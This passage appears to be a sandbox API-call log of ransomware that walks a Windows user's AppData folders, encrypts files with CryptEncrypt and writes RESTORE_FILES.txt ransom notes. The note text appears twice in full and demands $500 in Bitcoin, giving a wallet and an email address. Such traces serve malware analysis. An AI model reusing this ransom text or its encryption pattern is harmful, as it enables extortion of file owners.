dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.868] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.868] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\..") returned 62 [0089.868] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.868] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.868] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.868] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0089.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0089.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Windows") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Program Files") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Program Files (x86)") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="$Recycle.bin") returned 1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="System Volume Information") returned -1 [0089.868] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns") returned 66 [0089.868] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0089.868] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0089.868] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned 68 [0089.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.869] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.869] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\.") returned 68 [0089.870] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.870] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.870] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\..") returned 69 [0089.870] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.870] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.870] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.870] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\RESTORE_FILES.txt") returned 84 [0089.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.871] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.871] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.871] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.872] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.872] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.872] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.872] CloseHandle (hObject=0xd8) returned 1 [0089.872] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0089.872] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials") returned 71 [0089.872] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0089.872] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0089.872] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 73 [0089.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.872] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.872] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.872] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\.") returned 73 [0089.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.872] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.872] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.872] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.873] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.873] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.873] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\..") returned 74 [0089.873] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.873] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.873] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.873] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.873] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.874] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.874] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.874] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 89 [0089.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.875] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.875] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.876] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.876] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.876] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.876] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.876] CloseHandle (hObject=0xd8) returned 1 [0089.876] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0089.876] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto") returned 66 [0089.876] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0089.876] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0089.876] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned 68 [0089.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.877] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\.") returned 68 [0089.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.877] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.877] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.877] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.877] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\..") returned 69 [0089.877] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.877] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.877] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.878] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0089.878] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 70 [0089.878] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0089.878] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0089.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned 72 [0089.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.878] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.878] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.878] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.") returned 72 [0089.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.878] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.878] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.878] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.879] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.879] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.879] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.879] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\..") returned 73 [0089.879] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.879] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.879] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.879] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.879] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.879] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.879] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 